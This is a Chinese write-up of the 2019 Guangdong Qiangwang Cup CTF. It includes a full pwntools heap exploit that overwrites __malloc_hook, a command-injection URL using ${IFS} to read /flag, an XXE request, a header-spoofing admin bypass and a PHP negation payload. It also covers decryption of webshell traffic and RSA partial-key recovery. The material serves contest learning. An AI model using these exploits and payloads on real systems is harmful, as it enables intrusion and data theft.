2019广东强网杯_wp

Pwn

pwn1

  • Run函数有个条件竞争,可以泄漏libc,后面libc换了2.27,所以条件竞争配合uaf写fd指针到__malloc_hook然后改为one_gadget即可
2019广东强网杯_wp_第1张图片
from pwn import *
context.log_level = 'debug'

#p = process('./pwn1')
p = remote('119.61.19.212',8087)

def sl(x):
    p.sendline(x)

def ru(x):
    p.recvuntil(x)

def se(x):
    p.send(x)

def malloc(idx,cont):
    ru('run\n')
    sl('1')
    ru('index:\n')
    sl(str(idx))
    ru('content:\n')
    sl(cont)

def free(idx):
    ru('run\n')
    sl('2')
    ru('index:\n')
    sl(str(idx))

def run(idx,cont):
    ru('run\n')
    sl('3')
    ru('index:\n')
    sl(str(idx))
    ru('key:\n')
    se(cont)


malloc(0,'aaa') #0
malloc(1,'bbb') #1
malloc(2,'ccc') #2
malloc(3,'ddd') #3
malloc(4,'eee') #4
malloc(5,'fff') #5
malloc(6,'666') 
malloc(7,'777')
malloc(8,'888')

for i in range(1,8):
    free(str(i))

run(0,'a'*8)
free(0)
ru('run\n')
leak_libc = u64(p.recv(6).ljust(8,'\x00'))
info('leak libc : 0x%x'%leak_libc)
libc_base = leak_libc - 96 - 0x3ebc40
info('libc base : 0x%x'%libc_base)
one_gadget = libc_base + 0x4f322
malloc_hook = libc_base + 0x3ebc30


sl('1')
ru('index:\n')
sl('1')
ru('content:\n')
sl('1')

for i in range(2):
    malloc('1','1')

run(1,'a')
free(1)

ru('run\n')
leak_heap = u64(p.recv(6).ljust(8,'\x00'))
info('leak heap : 0x%x'%leak_heap)

sl('1')
ru('index:\n')
sl('2')
ru('content:\n')
sl('2')

info('malloc hook : 0x%x'%malloc_hook)
run(2,str(malloc_hook^leak_heap))
free(2)

sleep(2)
malloc(5,'a')
malloc(6,p64(one_gadget))

ru('run\n')
sl('1')
ru('index:\n')
sl('0')
#gdb.attach(p)
p.interactive()

Misc

完美的错误

  • 题目描述去除混淆的编码,于是联想到base58,又说错位,所以改一下字符集顺序爆破
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)


def b58encode(v):
    """ encode v, which is a string of bytes, to base58.
    """

    long_value = int(v.encode("hex_codec"), 16)

    result = ''
    while long_value >= __b58base:
        div, mod = divmod(long_value, __b58base)
        result = __b58chars[mod] + result
        long_value = div
    result = __b58chars[long_value] + result

    # Bitcoin does a little leading-zero-compression:
    # leading 0-bytes in the input become leading-1s
    nPad = 0
    for c in v:
        if c == '\0':
            nPad += 1
        else:
            break

    return (__b58chars[0] * nPad) + result


def b58decode(v):
    """ decode v into a string of len bytes
    """

    long_value = 0L
    for (i, c) in enumerate(v[::-1]):
        long_value += __b58chars.find(c) * (__b58base ** i)

    result = ''
    while long_value >= 256:
        div, mod = divmod(long_value, 256)
        result = chr(mod) + result
        long_value = div
    result = chr(long_value) + result

    nPad = 0
    for c in v:
        if c == __b58chars[0]:
            nPad += 1
        else:
            break

    result = chr(0) * nPad + result
    return result

def pailie(a):
    aa = a[0]
    bb = a[1:]+aa
    return bb

if __name__ == "__main__":

    for i in range(58):
        __b58chars = pailie(__b58chars)
        #print  b58encode("hello world")
        print  b58decode("RJv9mjS1bM9MZafGV77uTyDaapNLSk6t358j2Mdf1pbCByjEiVpX")
2019广东强网杯_wp_第2张图片

撸啊撸

  • 题目是个图片,拿到以后发现文件头多了点东西,猜测是文件修复
2019广东强网杯_wp_第3张图片
  • 谷歌搜了一下__PAGEZERO,发现是Mach-O文件格式,具体可以看https://amywushu.github.io/2017/02/21/基础知识-解读-Mach-O-文件格式.html,于是修复文件头,把0xffffffff改为0xcffaedfe,然后ida打开看,写个异或脚本
2019广东强网杯_wp_第4张图片
2019广东强网杯_wp_第5张图片
a = '938gce1`872db99db`b342d23c0g9g2d'
flag = ""
for i in a:
    b = chr(ord(i) ^ 1)
    flag += b

print 'flag{'+flag+'}'

脑筋急转弯

  • 拿到一个wav文件,猜测是wav隐写,最后用silenteye得到一个压缩包,爆破得到密码654321,然后打开压缩包有个txt
2019广东强网杯_wp_第6张图片
  • 012换成.!?,然后ook,brainfuck解码
2019广东强网杯_wp_第7张图片
2019广东强网杯_wp_第8张图片

抓灰阔

  • 一个流量包,仔细找传输的文件,发现main.jsp,再上网找资料,发现是冰蝎一句话木马,所以目前key和加密的payload有了,逐一解密payload
from Crypto.Cipher import AES
 
key = 'ba4ae3277932b0a2'
 
cipher = AES.new(key, AES.MODE_ECB)
 
#print(msg.encode("hex"))
f= open('./data/flag.enc','rb')
data = f.read()
f.close()
msg = data.decode('base64')
#msg = data
decipher = AES.new(key, AES.MODE_ECB)
f = open('./data/flag_dec.class','wb+')
print decipher.decrypt(msg)
b =  decipher.decrypt(msg)
#print b
f.write(b)
  • 本来想逐一反编译class为java文件,突然发现参数是写在class文件中的,然后找到一个串加密的payload中有上传一个flag文件
2019广东强网杯_wp_第9张图片
  • 于是把content的内容拿去base64解码后写入文件中,发现是elf文件,但是格式不对,根据https://blog.csdn.net/xuehuafeiwu123/article/details/72963229把第五字节到七字节修正,然后elf打开
2019广东强网杯_wp_第10张图片
2019广东强网杯_wp_第11张图片

写脚本解密

2019广东强网杯_wp_第12张图片

Crypto

强大的hash

  • 给了个hash,需要我们写脚本爆破,这里有个坑点是hash加密类型是$argon2d,不支持php
from argon2 import PasswordHasher


list = ["114","119","110","120","121","122","170","189","180","133","144","911"]

ph = PasswordHasher()
hash = "$argon2d$v=19$m=32768,t=100,p=1$MTIzNDU2Nzg$iuSRO5tkWxBxqgkI5g9O5ZersA//xvgvrKxH8QuxBBI4yKbG4aRFqITP/Rh5giFRuL9PTJP+/0BUfNwZHzx9bQ"
for i in list:
    for j in list:
        char = 'CTF_' + i + '_' + j
        try:
            print char
            if (ph.verify(hash, char)):
                print 'done : ',char
                exit(0)
        except Exception:
            pass
2019广东强网杯_wp_第13张图片

遗失的秘密

  • 见到过类似的题目https://www.40huo.cn/blog/rsa-private-key-recovery-and-oaep.html,先把n补全,然后改一改脚本的值,就能跑出flag
2019广东强网杯_wp_第14张图片
#!/usr/bin/python
#-*- coding:utf-8 -*-

import re
import pickle
from itertools import product
from libnum import invmod, gcd


def solve_linear(a, b, mod):
    if a & 1 == 0 or b & 1 == 0:
        return None
    return (b * invmod(a, mod)) & (mod - 1)  # hack for mod = power of 2


def to_n(s):
    s = re.sub(r"[^0-9a-f]", "", s)
    return int(s, 16)


def msk(s):
    cleaned = "".join(map(lambda x: x[-2:], s.split(":")))
    return msk_ranges(cleaned), msk_mask(cleaned), msk_val(cleaned)


def msk_ranges(s):
    return [range(16) if c == " " else [int(c, 16)] for c in s]


def msk_mask(s):
    return int("".join("0" if c == " " else "f" for c in s), 16)


def msk_val(s):
    return int("".join("0" if c == " " else c for c in s), 16)


E = 65537

N_ = """00:c4:9d:36:a4:77:76:12:12:85:24:6c:74:1d:7d:
    b3:ce:f4:c3:a4:69:cd:0b:2e:8f:d6:75:e3:80:b8:
    e8:1c:ce:e8:60:90:45:56:73:ab:32:32:00:7f:6a:
    76:3e:b6:10:d3:a2:74:da:f9:4e:a5:7e:ae:ef:f4:
    da:82:57:6d:68:82:50:d8:b1:fc:92:b1:5c:7d:54:
    f5:7e:d0:06:8a:60:ff:82:70:72:20:68:4b:71:ba:
    87:44:57:c1:97:a0:8a:2d:53:93:f3:0a:60:87:a3:
    85:c8:45:e6:0a:88:85:b5:ff:c7:09:9a:76:03:fe:
    99:b6:fb:8a:1e:9f:a8:42:3a:0a:c9:a9:bf:1c:87:
    2c:c4:99:10:db:46:e3:a9:a5:79:93:8c:75:71:ec:
    c6:3b:af:44:dc:60:c4:53:f6:3c:e8:73:2f:50:10:
    38:e7:6f:d0:a5:4b:ae:e3:1e:43:11:42:2c:a2:38:
    e6:3f:0b:13:54:63:e8:2f:9e:61:ab:08:65:97:e0:
    27:30:19:fd:a7:fe:5c:d8:11:b8:34:87:ad:02:c2:
    bc:cd:73:d3:86:be:fd:2a:b4:fe:7d:7e:d3:64:bb:
    6f:63:ed:a6:1d:ee:f2:80:da:9d:7a:23:7f:c1:39:
    b0:98:0c:85:8f:d0:4b:9f:e4:1a:26:fc:44:d1:67:
    03:32:03:0c:91:61:23:4c:81:6f:42:18:88:41:dc:
    27:55:a3:07:7c:a1:ad:f3:58:4d:91:07:65:f1:63:
    f2:34:d5:17:0e:59:c6:bb:b6:6d:7d:0c:d2:64:4b:
    b9:9c:52:59:03:8e:2a:43:23:76:33:c3:e8:72:3b:
    1c:e0:40:97:36:5f:ae:00:d7:e3:09:eb:df:55:44:
    22:b4:09:00:b5:09:41:70:6c:5c:3b:98:d3:34:7e:
    60:a2:b8:93:bd:af:32:77:48:48:8a:a5:9c:0e:6a:
    a1:79:36:86:8c:e9:3f:b1:a2:a7:4a:3a:d8:d6:f6:
    dd:62:d8:ae:9e:13:bb:0c:6b:b1:65:68:0d:7e:58:
    3f:68:1e:91:49:13:19:68:2b:fd:3c:5e:52:fa:76:
    b0:57:fc:0e:35:d8:71:56:41:06:ef:50:99:56:dd:
    d4:9a:1f:d3:46:26:12:9c:15:4b:43:fc:1b:de:c9:
    06:ad:82:56:63:c8:a4:83:32:d2:35:05:23:15:52:
    d9:0a:73:85:5e:c9:c2:56:af:69:d2:5f:77:04:28:
    c8:4c:b9:a6:d4:15:15:b5:15:99:13:ef:a9:a5:de:
    5a:74:b1:03:cf:32:a5:03:69:f8:e9:bb:7e:16:31:
    5e:43:e7:02:51:ac:c5:f6:bf:ef:1c:74:f7:13:0c:
    19:ad:"""





p_ranges, pmask_msk, pmask_val = msk("""00:  :05:89:  :bd:35:  :  :23:  :  :  :  :84:
      :  :ed:  :70:14:  :  :  :10:  :  :87:  :51:
    ea:  :97:69:  :52:  :  :  :  :  :ea:  :  :15:
      :  :34:  :be:11:23:  :  :34:14:  :94:  :10:
      :  :74:87:37:ee:81:62:ee:95:  :  :dc:49:dd:
      :  :35:  :81:  :fa:  :  :  :86:  :  :  :fb:
      :93:  :  :12:  :14:  :ab:76:  :96:  :  :27:
      :21:  :04:01:41:  :98:  :ff:  :  :12:dc:  :
    cd:  :39:95:30:  :47:  :fa:ff:  :34:  :ad:  :
      :52:02:fa:bc:14:22:22:48:61:62:bd:53:  :  :
    72:08:cb:41:88:  :  :  :63:91:30:fe:  :  :42:
    87:  :18:52:  :39:dd:  :68:  :fe:06:88:81:  :
      :  :  :ae:fd:  :  :fb:21:37:59:  :53:  :fa:
      :07:40:eb:33:77:51:64:10:dd:  :73:  :86:62:
      :bf:  :79:  :34:  :bb:  :44:ff:  :46:fe:90:
    ef:  :52:ad:  :  :fe:  :69:18:89:bd:cd:09:46:
      :  :74:71:  :  :  :41:66:  :  :11:  :25:  :
    39:8b""")

q_ranges, qmask_msk, qmask_val = msk("""00:ce:43:ef:  :76:58:17:43:31:  :  :32:70:  :
    89:  :  :36:55:06:  :79:66:78:  :  :  :  :  :
      :85:  :  :  :  :  :33:bb:  :  :56:  :66:cb:
      :08:  :  :90:cb:  :  :24:fa:ca:47:  :  :  :
      :88:  :83:01:  :62:  :  :  :  :  :  :ad:ae:
      :  :  :58:  :ec:  :  :  :09:04:86:  :05:00:
      :df:50:84:81:80:  :ae:  :24:  :94:da:  :04:
    ce:  :ef:  :  :ed:be:bf:43:78:  :  :05:93:  :
    08:52:05:  :  :  :  :ae:  :  :  :  :ab:  :  :
      :76:ce:  :  :  :  :19:bd:22:  :ef:dc:bf:ea:
    ab:78:01:  :  :85:  :  :  :ea:  :  :fb:  :  :
    92:66:19:  :  :ab:  :  :82:  :  :31:  :  :da:
    82:  :13:82:43:  :  :94:13:41:  :  :  :37:  :
      :04:56:02:87:dd:  :58:27:  :  :24:  :  :  :
    28:  :  :09:14:89:  :  :  :49:59:  :16:eb:65:
      :01:22:  :  :dd:  :78:  :  :db:90:  :ac:  :
      :fd:  :03:74:  :  :  :  :92:  :00:ba:  :  :
      :05""")

_, dmask_msk, dmask_val = msk("""11:  :  :69:62:64:  :  :  :  :15:  :13:de:de:
    cf:  :  :17:  :  :75:  :98:42:fc:  :12:15:08:
      :  :  :  :  :36:  :be:25:48:  :  :19:  :  :
      :47:11:19:  :03:  :49:fc:da:  :96:45:eb:  :
      :  :  :91:  :ea:  :  :55:ff:  :37:58:  :  :
    19:  :  :73:40:  :91:15:01:da:91:22:fd:32:  :
      :  :50:  :  :66:  :  :  :42:  :  :ef:  :  :
    df:42:  :97:30:  :39:  :  :  :  :  :  :dc:  :
      :  :  :  :  :38:  :  :  :88:28:  :05:  :  :
    78:59:fa:  :86:  :19:24:  :  :  :  :da:cf:15:
    39:  :  :  :  :ef:55:  :ce:47:  :58:89:  :fb:
      :24:  :  :  :92:  :  :ee:  :  :db:67:31:ce:
      :28:  :72:ec:89:  :04:  :  :50:  :  :  :  :
      :37:  :44:  :  :  :  :56:  :38:  :bb:47:bb:
    66:83:99:22:07:72:  :  :48:52:02:  :  :  :29:
      :82:56:  :67:  :95:  :  :56:94:  :  :71:  :
    bf:27:98:  :  :54:98:26:06:87:  :ae:  :53:be:
      :  :80:37:60:61:ea:ef:de:  :  :df:90:81:  :
    70:  :06:33:26:  :75:fe:95:  :92:  :78:cd:05:
    64:cc:68:  :  :36:54:  :bd:16:90:ee:60:  :  :
      :  :41:  :  :91:  :79:58:06:50:  :46:  :  :
    45:  :09:ca:ac:16:  :27:98:  :  :ba:82:  :77:
    93:98:ad:  :15:  :67:53:97:ad:ee:50:44:  :31:
    07:  :ff:01:  :09:  :  :  :  :  :46:  :  :42:
    15:  :db:df:42:be:  :  :  :78:  :41:  :  :  :
      :14:  :  :25:fc:  :84:  :  :  :  :  :  :20:
    da:46:01:eb:87:  :12:57:  :  :56:af:  :87:93:
    60:  :02:  :18:89:63:72:ad:  :ed:cf:  :  :84:
      :22:  :13:  :  :dd:  :ff:  :  :  :de:62:37:
      :19:66:  :  :86:02:  :38:  :  :  :  :ec:14:
    12:  :43:93:19:65:98:  :  :03:  :  :  :ef:  :
      :  :ca:07:92:22:  :  :bb:15:eb:  :  :  :35:
      :72:29:cd:  :  :99:  :  :  :  :41:06:  :  :
      :43:33:  :32:  :  :54:be:92:62:  :78:59:42:
    79:89""")

_, dpmask_msk, dpmask_val = msk(""" :39:  :28:16:02:89:ce:11:fe:  :  :  :  :af:
      :  :  :ed:97:  :  :11:20:ba:ae:98:ad:  :  :
      :10:87:ac:07:  :  :  :  :50:  :  :70:50:52:
    df:89:eb:02:  :  :  :  :93:11:  :  :12:  :56:
      :08:  :  :ea:  :10:fa:19:  :  :  :54:45:07:
      :  :bc:ff:33:  :db:63:49:fe:52:  :33:  :  :
    bf:cd:45:91:  :10:  :  :92:81:40:03:  :80:  :
    29:  :30:  :ed:43:64:ca:  :bf:64:  :  :bf:  :
      :  :  :24:72:84:  :  :ff:  :  :24:  :81:27:
    db:23:  :64:  :67:  :ba:  :  :bc:  :  :  :  :
      :ae:88:  :  :  :  :  :91:  :  :14:  :ba:ef:
      :89:  :  :  :  :  :  :  :  :05:  :75:52:  :
      :  :  :be:ad:df:  :02:88:00:  :  :15:45:  :
    cf:32:  :ca:  :93:  :32:  :40:  :27:dd:  :19:
    73:dc:  :  :  :  :  :cf:  :  :dd:  :  :ca:  :
    ee:  :ca:  :  :  :49:  :27:  :58:53:  :64:25:
      :22:06:16:ff:62:bc:  :  :  :  :24:fc:  :  :
    df""")

_, dqmask_msk, dqmask_val = msk("""02:  :bd:  :19:25:98:75:  :65:  :55:28:33:bc:
    34:84:91:01:96:  :  :08:  :32:45:  :27:  :  :
      :fe:  :bb:63:32:68:  :51:bd:75:40:  :52:52:
      :  :  :78:85:fc:94:  :07:  :14:  :  :  :  :
    15:dd:  :  :93:  :01:  :  :77:ca:  :40:  :da:
      :89:bc:87:62:dc:ac:61:88:  :  :70:  :69:  :
      :36:  :  :21:08:  :dc:73:  :ad:da:ee:fe:  :
    96:  :58:  :  :46:  :29:ff:97:ce:  :  :  :cb:
    51:  :  :81:  :22:  :  :19:  :10:69:41:36:ca:
      :22:49:  :cc:cf:06:  :  :08:  :76:  :  :45:
    98:  :  :45:  :  :  :69:13:65:  :  :da:54:  :
    19:  :ee:24:  :73:  :  :  :  :  :  :18:53:40:
    21:25:  :  :84:52:cd:  :49:33:78:  :  :ed:  :
    25:27:  :  :  :ca:  :  :  :ca:  :  :bc:  :02:
    31:70:  :10:ca:84:59:  :  :  :52:  :27:76:  :
    47:  :66:bf:ff:  :03:  :99:ff:  :df:  :  :  :
      :46:27:45:  :65:07:  :48:da:dc:  :80:  :  :
    f9""")


def search(K, Kp, Kq, check_level, break_step):
    max_step = 0
    cands = [0]
    for step in range(1, break_step + 1):
        #print " ", step, "( max =", max_step, ")"
        max_step = max(step, max_step)

        mod = 1 << (4 * step)
        mask = mod - 1

        cands_next = []
        for p, new_digit in product(cands, p_ranges[-step]):
            pval = (new_digit << ((step - 1) * 4)) | p

            if check_level >= 1:
                qval = solve_linear(pval, N & mask, mod)
                if qval is None or not check_val(qval, mask, qmask_msk, qmask_val):
                    continue

            if check_level >= 2:
                val = solve_linear(E, 1 + K * (N - pval - qval + 1), mod)
                if val is None or not check_val(val, mask, dmask_msk, dmask_val):
                    continue

            if check_level >= 3:
                val = solve_linear(E, 1 + Kp * (pval - 1), mod)
                if val is None or not check_val(val, mask, dpmask_msk, dpmask_val):
                    continue

            if check_level >= 4:
                val = solve_linear(E, 1 + Kq * (qval - 1), mod)
                if val is None or not check_val(val, mask, dqmask_msk, dqmask_val):
                    continue

                if pval * qval == N:
                    print "Kq =", Kq
                    print "pwned"
                    print "p =", pval
                    print "q =", qval
                    p = pval
                    q = qval
                    d = invmod(E, (p - 1) * (q - 1))
                    coef = invmod(p, q)

                    from Crypto.PublicKey import RSA
                    print RSA.construct(map(long, (N, E, d, p, q, coef))).exportKey()
                    quit()

            cands_next.append(pval)

        if not cands_next:
            return False
        cands = cands_next
    return True



def check_val(val, mask, mask_msk, mask_val):
    test_mask = mask_msk & mask
    test_val = mask_val & mask
    return val & test_mask == test_val


# K = 4695
# Kp = 15700
# Kq = 5155

for i in range(0xff):
    N = N_ + hex(i)[2:].rjust(2,'0')

    N = to_n(N)
    print "index : ",i

    for K in range(1, E):
        # if K % 100 == 0:
        #     print "checking", K
        if search(K, 0, 0, check_level=2, break_step=20):
            print "K =", K
            break

    for Kp in range(1, E):
        # if Kp % 1000 == 0:
        #     print "checking", Kp
        if search(K, Kp, 0, check_level=3, break_step=30):
            print "Kp =", Kp
            break

    for Kq in range(1, E):
        # if Kq % 100 == 0:
        #     print "checking", Kq
        if search(K, Kp, Kq, check_level=4, break_step=9999):
            print "Kq =", Kq
            break
#!/usr/bin/python
# coding=utf-8
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
import gmpy2

p = 30804877236372761296348297513767908130120426767441642194038947059431749919743933282721728129660558520306627781991434638545287122418576024822599938752655436891429241798416041881441469038271460545196755187872022209260074336340748692939443634393492611052850561312058115000234467417922716845989845380178291512893577636848676778152648705150749219629638913963012345388388992649857974643758097581431795569765569985118215469798809551704275008726932734117893757436777110974529289423114881289423038562352073193732977840168067817149865622380253870276206212656648830136975036452877460473463818007722056777837507566352911184181643
q = 26038591288856688238001759665609016744197175469090080494077820415283745172609947555684568450035539489682168553390403854805974969118763740560638548072896648612347287461822059996717273680094814363090434263883250281614203478279438635312321752371517752177819983938115532573238089291708699056464231184039223531822571471611431921747169774540943776543504663419138030516108434288911593973010680364553026970545232818747951718950151516127319881685156986937644295056292836729469548074713781625918117631575942194589642230959265894967721587381648790905383499092379075578245308113268969812469233669312409066969648987454629639842309

N = p*q
e = 65537

#print N
#print e
phin = (p-1)*(q-1)
d = gmpy2.invert(e, phin)
# with open('private.pem', 'r') as f:
#     private = RSA.importKey(f)
#     oaep = PKCS1_OAEP.new(private)

with open('flag.txt.en', 'rb') as f:
    data_enc = int(f.read().encode('hex'),16)
plain = gmpy2.powmod(data_enc, d, N)
plain = hex(plain)[2:]
if len(plain) % 2 != 0:
    plain = '0' + plain
print plain.decode('hex')
2019广东强网杯_wp_第15张图片

美好的回忆

利用第二段 爆破key,然后解密

#coding:utf-8

raw ="ood time"

two = [0xCD, 0xD9, 0x3B, 0x0A, 0xCF, 0xAA, 0x2A, 0x1E]

iv = [0x55, 0xE5, 0x9E, 0x0E, 0x27, 0x8A, 0x34, 0x63]

#通过iv 和 密文 和 原文 可以算出 key

key = []
for i in raw:
    key.append(ord(i))


t_key =[]

for i in xrange(8):
    for j in xrange(256):
        if two[i]^j^iv[i] == key[i]:
            # t_key.append(chr(key[i]))
            t_key.append(j)

print t_key


f = file('flag.txt.encrypted','r')



raw_iv = f.read(8)

flag=''

for i in xrange(7):
    enc = f.read(8)
    for i in xrange(8):
        flag+=chr(ord(raw_iv[i])^t_key[i]^ord(enc[i]))
    raw_iv = enc

print flag

悲伤的结局

  • 爆破 最后的padding 其他和上一题一样
#coding:utf-8


# print 19 ^ 24 ^ 1
# exit()



raw ="keep away from xiaocui!"

# raw = "have a good time.flag{21cb8c804abb60be5c9befcc928ccf5b}"


BLOCK_SIZE =8

def pad(data):
    padding_len = BLOCK_SIZE - len(data) % BLOCK_SIZE
    return data + (chr(padding_len) * padding_len).encode()

#存在8种可能性

for i in xrange(8):
    print '--------------------'
    n=i+1
    raw_last = raw[-n-8:-n]
    print raw_last
    print pad(raw_last)
    raw_last = pad(raw_last)

    iv = [0x15,0xEC,0x98,0x1C,0x6E,0xCD,0x6A,0x35]
    two = [0xDB, 0xDD, 0x3C, 0x5E, 0x91, 0xE7, 0x20, 0x1F]
    # two = [0x14, 0xED, 0x9E, 0x1C, 0x38, 0xCC, 0x2E, 0x0D]


    two = [0xF7,0x84,0x4B,0xE5,0x61,0x93,0x7B,0x98]
    iv =[0x0A,0x23,0x86,0xED,0xB9,0xFF,0x9D,0x81]

    # two = [0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]

    # two = [0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]

    #[247, 83, 193, 36, 156, 73, 115, 24]
    # two = [0xEB,0xB6,0x57,0x30,0xAC,0x8D,0x55,0x1D]
    # iv = [0x14,0xED,0x9E,0x1C,0x38,0xCC,0x2E,0x0D]

    # 通过iv 和 密文 和 原文 可以算出 key

    [0xE5, 0x20, 0xD1, 0x51, 0x08, 0xDB, 0x11, 0xF3]
    [0x56, 0x04, 0xEB, 0xA1, 0xDA, 0xB7, 0xFD, 0xF7]
    [0xFD, 0xA7, 0x71, 0xBC, 0x13, 0x9E, 0x13, 0xBC]
    [0x4C, 0x08, 0xAE, 0xA6, 0x92, 0xBC, 0xFC, 0xA3]
    [0xB1, 0xBA, 0x66, 0xBA, 0x5F, 0x89, 0x5C, 0xA1]
    [0x02, 0x5C, 0xA8, 0xBB, 0x9B, 0xAC, 0xAE, 0xEA]
    [0xB7, 0xFF, 0x73, 0xA0, 0x4E, 0x93, 0x02, 0xA1]
    [0x08, 0x4C, 0xBD, 0xE9, 0x86, 0xB1, 0xA2, 0xBE]
    [0xBD, 0xEF, 0x6E, 0xF2, 0x07, 0x98, 0x5B, 0xB0]
    [0x13, 0x07, 0xDE, 0xCC, 0xCE, 0xBD, 0xB8, 0xB3]
    [0xE2, 0xE1, 0x05, 0xD6, 0x4F, 0x85, 0x50, 0xBD]
    [0x46, 0x07, 0xD4, 0xD6, 0x9D, 0xBA, 0xFC, 0xF6]
    [0xF8, 0xAE, 0x00, 0xCC, 0x49, 0x9B, 0x19, 0xB3]
    [0x2F, 0x0E, 0xD6, 0xC4, 0x8F, 0xAC, 0xA9, 0xBD]
    [0xCA, 0xFA, 0x0A, 0x9C, 0x4B, 0xD5, 0x4B, 0xE1]
    [0x22, 0x0A, 0x88, 0xCD, 0x88, 0xAD, 0xAE, 0xBC]
    [0x9B, 0xFF, 0x0B, 0xC7, 0x19, 0xD9, 0x48, 0xE6]
    [0x70, 0x0C, 0x80, 0xCD, 0x81, 0xA6, 0xB5, 0x87]
    [0xFE, 0xA5, 0x1A, 0xFD, 0x4F, 0x9F, 0x5B, 0x8B]
    [0x0F, 0x30, 0xCF, 0xB4, 0xBD, 0xBA, 0xB6, 0x90]
    [0xBE, 0x93, 0x59, 0x8E, 0x73, 0xD6, 0x78, 0x9A]
    [0x0A, 0x23, 0x86, 0xED, 0xB9, 0xFF, 0x9D, 0x81]
    iv = [0xF7, 0x84, 0x4B, 0xE5, 0x61, 0x93, 0x7B, 0x98]
    two =[0x45, 0x2F, 0xD1, 0xF4, 0xA9, 0xBE, 0x94, 0x90]
    [0xED, 0x80, 0x4A, 0x97, 0x0C, 0xF6, 0x10, 0xFF]
    #


    key = []
    for i in raw_last:
        key.append(ord(i))

    t_key = []

    for i in xrange(8):
        for j in xrange(256):
            if two[i] ^ j ^ iv[i] == key[i]:
                # t_key.append(chr(key[i]))
                t_key.append(j)

    print t_key

    f = file('flag.txt.encrypted', 'r')

    raw_iv = f.read(8)

    flag = ''

    for i in xrange(24):
        enc = f.read(8)
        for i in xrange(8):
            flag += chr(ord(raw_iv[i]) ^ t_key[i] ^ ord(enc[i]))
        raw_iv = enc

    print flag

exit()

Web

XX

  • 源码泄漏 index.php~,Xxe 利用
POST /index.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 119.61.19.212:8083
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 225



]>

&xxe;
111`

ping

  • 利用ifs绕过空格,利用/flag绕过flag
http://119.61.19.212:8081/index.php?A=a;grep${IFS}fla${IFS}/fla*
2019广东强网杯_wp_第16张图片

小明拒绝

  • 头部加上
X-Forwarded-For: 127.0.0.1
Cookie: admin=1

php

  • 利用取反

生成取反的exp

即可

view-source:http://119.61.19.212:8082/index.php?code=(~%B8%9A%8B%A6%90%8A%8D%B9%93%9E%98)();

找漏洞

  • 存在注入,可以读出信息
2019广东强网杯_wp_第17张图片
2019广东强网杯_wp_第18张图片
  • 密码明文
2019广东强网杯_wp_第19张图片
  • 模板注入,需要上传模板,由于没找到key,采用爆破的方式访问注入的页面
2019广东强网杯_wp_第20张图片

API

  • 扫描目录发现
2019广东强网杯_wp_第21张图片
  • 直接有flag
2019广东强网杯_wp_第22张图片
  • 常规思路应该是Api目录爆破file参数,读到hack.php文件代码,hack.php写文件

你可能感兴趣的:(2019广东强网杯_wp)